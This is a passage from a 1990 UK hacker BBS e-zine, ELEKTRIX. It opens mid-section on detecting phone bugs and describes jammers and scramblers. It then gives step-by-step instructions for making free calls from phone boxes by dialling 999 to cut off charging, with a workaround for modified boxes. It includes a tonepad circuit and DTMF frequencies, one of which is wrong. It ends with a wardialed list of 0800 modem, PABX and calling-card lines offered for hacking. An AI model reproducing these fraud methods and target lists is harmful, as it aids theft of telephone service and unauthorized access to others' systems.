  1595. station. If one is bought with a receiver circuit then it is tunable so you ca
  1596. tune into the frequency of the bug. Also an amplifier can aid detection.
  1597.  
  1598. Feed Back Detector
  1599.  
  1600. When a transmitter gets to close to a receiver then feedback is produced ( if
  1601. at the same frequency). This type of detector relies on feedback and is couple
  1602. to an amplifier and a receiver circuit. When using these you will need a noise
  1603. for the bug to transmit ( singing etc.) ,Then you simply scan through the
  1604. frequencies and if there is a bug transmitting you will get a squeal as the
  1605. detector hits the same frequency.
  1606. The Feedback detector generally has a further range but can tip off an
  1607. eavesdropper because of the noise.
  1608.  
  1609. Telephone Analyser
  1610.  
  1611. This is expensive equipment which will carry out a series of tests on a phone
  1612. line semi automatically. These are particularly useful when dealing with
  1613. complicated phone set ups like a switchboard. Tracing an individual pair of
  1614. wires without one of these can be tedious.
  1615.  
  1616. The tests actually carried out vary from machine to machine, they usually come
  1617. in attache cases and are battery powered. The first test will be to measure th
  1618. voltage across a phone line when the phone is on and off the hook. If the volt
  1619. is lower than it should be it may be a bug. If the voltage at the mic is too h
  1620. then it could be a bug. There is no difference between this and an ordinary vo
  1621. meter. The next test is a tone sweep, the analyser sweeps through the spectrum
  1622. and then if anything which reacts to a tone is on the line it will reduce the
  1623. voltage on the line and the analyser will detect this, stop and give you a
  1624. warning.
  1625.  
  1626. The next test is high voltage pulsing a charge is built up then fired down the
  1627. line, some hookswitch defeats use a change of voltage to trigger them, if
  1628. a hook switch is activated the analyser will pick up the voltage of the
  1629. microphone and the alarm will go off.
  1630.  
  1631. Another test is audio listening, the operator will listen to the line and an
  1632. acoustic generator is switched on. If the operator hears a tone down the line
  1633. then some osrt of hookswitch defeat is in operation, this method can also dete
  1634. infinity transmitters as any noise will be transmitted down the line which the
  1635. operator will hear. Each individual wire is tested against each other to see i
  1636. the sound from the generator is being transmitted down the phone line. (n.b.
  1637. tone has to be around voice frequency).
  1638.  
  1639. Any good analyser wil test al these any may even test for conductive paint on
  1640. casing being used.
  1641.  
  1642. Spectrum Analyser
  1643.  
  1644. This sweeps entire frequency bands in the same way as a field strength meter
  1645. searches for radiation. A typical sophisticated Spectrum Analyser can sweep
  1646. between 20 kilohertz and 2000 megahertz. Some can do this all in one go or in
  1647. separate plug in modules. It should carry out the scan automatically and when
  1648. it detects a transmission it will stop and display the frequency, and the
  1649. strength of the signal on a field strength meter and let you listen to the
  1650. transmission on an internal speaker. Some analysers have a cathode ray tube
  1651. as an oscilloscope to display the waveform and even buy another CRT which show
  1652. the frequency versus amplitude of demodulated components of the primary signal
  1653. such as subcarriers, and a second frequency indicator for the subcarrier.
  1654.  
  1655. You can pick up a spectrum analyser which detects RF radiation including singl
  1656. sideband, pulse width transmissions and those with the carrier wave removed, o
  1657. a very wide band coverage.
  1658.  
  1659. Cable Checkers
  1660.  
  1661. This is just a portable metal detector to see where mysterious wiring is going
  1662. they can be bought anywhere. Also a screamer is available which will detect
  1663. whther there is a microphone on either end and the MIC will emit a loud noise
  1664. and so can be located. Also you can use an inductive mic and an amplifier to
  1665. check to see if anything is on the line.
  1666.  
  1667. Detectors can be built using a field strength meter and replacing it with a
  1668. led, some have a sensitivity control.
  1669.  
  1670. Another way to detect a bug is to install a telephone watchdog which detects
  1671. the resistance or capacitance of the line, if anybody cuts in or installs a bu
  1672. the devices led will go on - this will only respond to change so any bug on
  1673. already wil not be detected.
  1674.  
  1675. Scramblers - simple scramblers are available, but so are descrambler`s. The
  1676. more expensive scramblers alter the frequency and parts of speech around 650
  1677. to 750 times a second. These can virtually defeat any attempt to descramble,
  1678. except of course the american security agency.
  1679.  
  1680. Jammers - these are simply wide band transmitters which transmit white noise.
  1681. these will also jam tv`s radios etc....Another jammer uses two high frequency
  1682. transmitters and will cause any microphone to squeal at the difference between
  1683. the two. Another magnetically induces an intense noise in the handset micropho
  1684. which will block any infinity or hookswitch defeats. Any contact mics can be
  1685. jammed by buzzers or vibrators stuck to the window or sounding board.
  1686.  
  1687. THE detector - all bugs use at least one semi conductor, if an ultra high
  1688. freqency carrier wave is emmited it will be radiated back by the bug. This
  1689. radiation will contain strong harmonic components - ( a harmonic is a componen
  1690.  where the frequency is an exact numerical multiple of the fundamental or
  1691. strongest frequency. This strongest frequency is the first harmonic, twice the
  1692. frequency is the second harmonic and so on.). Other objects will only radiate
  1693. back to the second harmonic and only a semi-conductor junction will produce a
  1694. third harmonic. A small UHF transmitter and a reciver tuned to the third
  1695. harmonic is all that is needed ( use like a field strength meter), the radiati
  1696. emitted back will be minute so teh detector will be expensive and have to be v
  1697. close to the bug.
  1698.  
  1699.  
  1700. --------------------- Palm Beach BBS - +44(303)-265979 -----------------------
  1701.  
  1702.  ----------------------------------------------------------------------------
  1703. |                                                                            |
  1704. |                     ELEKTRIX Issue 1 - Part 4                              |
  1705. |                     ~~~~~~~~~~~~~~~~~~~~~~~~~                              |
  1706. |                                                                            |
  1707. |             Make your own Tonepad for Phone Box phreaking                  |
  1708. |                             by Maxhack                                     |
  1709. |                                                                            |
  1710. |                  PALM BEACH BB UK ++44(303)-265979                         |
  1711. |                                                                            |
  1712.  ----------------------------------------------------------------------------
  1713.  
  1714.   The Technique
  1715.  
  1716.     Some weeks ago free  dialling with tonepads  came to the news in a daily
  1717.  newspaper. Since then there has been much in the way of media hype covering
  1718.  these  devices in computer magazines  and hackers files. This  file will, I
  1719.  hope,make the whole practise clear and the method easy and also less costly
  1720.  than previously.
  1721.     The way it  works is as follows: The technique will ONLY work from phone
  1722.  boxes contrary to what you may have been told. You may also find that it is
  1723.  not working on  some London phone boxes - this is due to the fact that many
  1724.  have been modified to disallow phreakers from using the method.
  1725.     The technique relies on the fact that dialling 999 on a phone box auto-
  1726.  matically disconnects the charging mechanism whilst the call is being made.
  1727.  The tonepads which allow people to make free calls are just portable models
  1728.  of the tone-dialling telephone circuits that are in your telephones and in
  1729.  modern modems. The tones they generate are perfectly 'legal' and are simply
  1730.  used in portable units for Computerdial services (Share price indexes,etc.)
  1731.  for travelling businessmen and other groups who may use such services (like
  1732.  voice mail or whatever). All you do is the following:
  1733.  
  1734.  [1] Go to a phone box.
  1735.  [2] Dial the number you wish to connect to using the keypad.
  1736.  [3] As soon as the phone starts ringing dial 999 on the phonebox machine as
  1737.      fast as possible. This will have cut the charging mechanism and you will
  1738.      have a free call.
  1739.  
  1740.  * For boxes that have been modified......Simply put 10p in first then do *
  1741.  * it - you won't loose your money but you will still make a free call.   *
  1742.  * This has to be done since they are modified so that they won't dial a  *
  1743.  * number (except 999/linkline 0800/government) unless money has been dep *
  1744.  * osited in the machine.
  1745.  
  1746.  
  1747.  Method 1
  1748.  --------
  1749.  
  1750.     You can record the tones required to dial a number onto a tape and then
  1751.  play them down the telephone with a standard taperecorder. This has three
  1752.  main drawbacks however although it is the least costly method.
  1753.  
  1754.  1) You will need to record a different set of tones for each number. So un-
  1755.     less you dial a few numbers repeatedly then you are going to find this
  1756.     method very tiresome. You'll need to have a DTMF modem/phone too.
  1757.  
  1758.  2) The phone system requires that each tone is within 1.5% of the specified
  1759.     frequencies. This will prove to be difficult if you don't own very good
  1760.     recording equipment.
  1761.  
  1762.  3) You will look very conspicuous playing around with a tape recorder in a
  1763.     phone box.
  1764.  
  1765.     Despite the disadvantages it has to be remembered that this method is the
  1766.  cheapest option open to you.
  1767.  
  1768.  
  1769.  Method 2
  1770.  --------
  1771.  
  1772.   This involves building your own portable tonepad (unless you want to fork
  1773.  out £12-50 for a Tandy one). The device is small, effective and relatively
  1774.  cheap.
  1775.  
  1776.   One method is as follows:
  1777.  
  1778.  
  1779.       [Battery]       _______
  1780.          +9V --------|6      |----<14-----123
  1781.                      |       |----<13-----456 Numeric Keypad lines
  1782.                      |       |----<12-----789
  1783.              --------|16     |----<11-----*0#
  1784.  [Speaker]   S       |       |----<3------'||
  1785.              --------|1      |----<4-------'|
  1786.              |     | |       |----<5--------'
  1787.              |     --|15    7|---
  1788.              |       |       |  X [3.579545 MHz Crystal]
  1789.              |       |      8|---
  1790.              |        -------
  1791.             GND       TCM5087
  1792.   (-Ve on battery)
  1793.  
  1794.  That way is simple to build since few components are needed...get a keypad
  1795.  off an old remote controller or something...or make your own from Push-to-
  1796.  make switches. Other methods include using two 555s to generate the tones
  1797.  or two 8037s (wave form gen. chips) though this is a little too expensive
  1798.  for my liking and only needs more complex circuitry.
  1799.  
  1800.  If you intend to use 555s then you'll need a monostable on each 555 and the
  1801.  frequencies used are as follows:
  1802.  
  1803.  * - 941 & 1209 Hz
  1804.  # - 941 & 1477 Hz
  1805.  0 - 941 & 1336 Hz
  1806.  1 - 697 & 1209 Hz
  1807.  2 - 697 & 1336 Hz
  1808.  3 - 697 & 1477 Hz
  1809.  4 - 770 & 1209 Hz
  1810.  5 - 770 & 1306 Hz
  1811.  6 - 770 & 1477 Hz
  1812.  7 - 852 & 1209 Hz
  1813.  8 - 852 & 1336 Hz
  1814.  9 - 852 & 1477 Hz
  1815.  
  1816.  
  1817.  -------------------- Palm Beach BBS ++44(303)-265979 -----------------------
  1818.  
  1819.  ----------------------------------------------------------------------------
  1820. |                                                                            |
  1821. |                     ELEKTRIX Issue 1 - Part 5                              |
  1822. |                     ~~~~~~~~~~~~~~~~~~~~~~~~~                              |
  1823. |                                                                            |
  1824. |             Freefone interrogation - the ultimate listing                  |
  1825. |                            by Agent 7                                      |
  1826. |                                                                            |
  1827. |                  PALM BEACH BB UK ++44(303)-265979                         |
  1828. |                                                                            |
  1829.  ----------------------------------------------------------------------------
  1830.  
  1831.  
  1832.    I have undertaken a massive dial through of LINKLINE (0800) numbers to be
  1833.  listed in this and forthcoming  issues of ELEKTRIX. All were known to be in
  1834.  working order  when this first issue went out - May 1990. Some you may have
  1835.  seen before - others you  won't. I've simply collected all the known ones I
  1836.  could find which were still working and listed useful information for each.
  1837.    Since there seems to be much going on with Voice mailboxes, computerdial,
  1838.  test lines, and PABX hacking lately I have included these too with comments
  1839.  where appropriate as well as the standard modem lines. Since on occasions a
  1840.  great many numbers 'side by side' have been engaged at the same time I have
  1841.  included this since it may  give clues to the nature of the line-use should
  1842.  you wish to pursue these.
  1843.    The ranges that I have  dialled through myself  have not always been in a
  1844.  logical  fashion - but then it gets real  boring dialling through 1000 dead
  1845.  numbers. So I try to vary it. But the  results have been reasonable. If you
  1846.  have made any dials through 0800 or just  modem wardials then please let us
  1847.  have the results so we can share them with others - it's also pointless two
  1848.  people dialling through the same ranges.
  1849.    I hope these lists bring you much fun! Regards Pop
  1850.  
  1851.  Key: node   = (xxx---)
  1852.       number = (---xxx)
  1853.  
  1854.  Node info:
  1855.  
  1856.  321 - This seems to be a test area for BT's latest projects (voicedial,
  1857.        computerdial, intelligent fax services etc.)
  1858.  
  1859.  
  1860.  node        number      results           notes
  1861.  ----        ------      -------           -----
  1862.  
  1863.  321          100        computerdial      Announced as 'Remote Update', it
  1864.                                            requires 3 digit service codes.
  1865.             101-109      no service
  1866.               110        digital recording 'This service is no longer avail-
  1867.                                            able'.
  1868.               111        digital recording 'Goodbye'.
  1869.               112        digital recording 'Goodbye'.
  1870.               113        digital recording 'Please press start on your fax
  1871.                          + fax response    machine'.
  1872.             114-115      computerdial      British Telecom Weather Centre.
  1873.                          + optional fax     With voice + fax forecasts.
  1874.               116        digital recording 'Goodbye'.
  1875.               117        digital recording 'This is 0800 briefing'.
  1876.                          + fax response
  1877.               118        computerdial      Puzzleline test service.
  1878.                          + optional fax
  1879.               119        computerdial      BTRL estate agency test service.
  1880.               120        PABX computerdial In the form xxx. 580 - 0800 Brief
  1881.                                            Response#1 'That number is not
  1882.                                                                   listed.'
  1883.                                            Response#2 'That number was not
  1884.                                                      specified correctly.'
  1885.             121-123      fax response
  1886.             124-126      PABX computerdial
  1887.             127-129      fax response
  1888.             130-139      rings and rings
  1889.             140-141      No service
  1890.               142        Engaged
  1891.               143        No service
  1892.               144        Engaged
  1893.             145-146      No service
  1894.               147        rings and rings
  1895.             148-149      No service
  1896.             150-179      Engaged
  1897.             180-199      rings and rings
  1898.  
  1899.  282          443        MODEM 2400        Does nothing
  1900.               809        Weird             Autoanswers then nothing
  1901.               861        MODEM 1200/75
  1902.               871        MODEM 1200 8/N/1  Does nothing
  1903.  
  1904.  289          237        STRANGE TONES
  1905.               384        Voice recording   '45-55' - Weird
  1906.               485        MODEM 1200/75
  1907.               643        MODEM 2400        The old US dialout
  1908.               783        MODEM 1200/75
  1909.               817        MODEM 1200 7/E/1  Comes up with '+++ ? ERROR'
  1910.                                            CTRL-E gives '28301 DMLDN G'
  1911.                                            Enter SYS - gives '+++ STF GO'
  1912.  
  1913.  456          100        Computerdial      BT Service centre computerdial sys
  1914.  
  1915.  521          509        MODEM 2400        Weird prompt
  1916.  
  1917.  585          111        MODEM 1200/75     Cambridge PSS port - not connected
  1918.  
  1919.  891          002        PABX              Resource line DTMF then * code
  1920.               004        AT&T CARD PABX    Calling card service
  1921.               831        MODEM 2400        Yale Direct login
  1922.  
  1923.  898          058        PABX
  1924.  
  1925.  
  1926.  Uptodate list to be included in each ELEKTRIX issue.....
  1927.  
  1928.  -------------------- Palm Beach BBS ++44(303)-265979 -----------------------
  1929.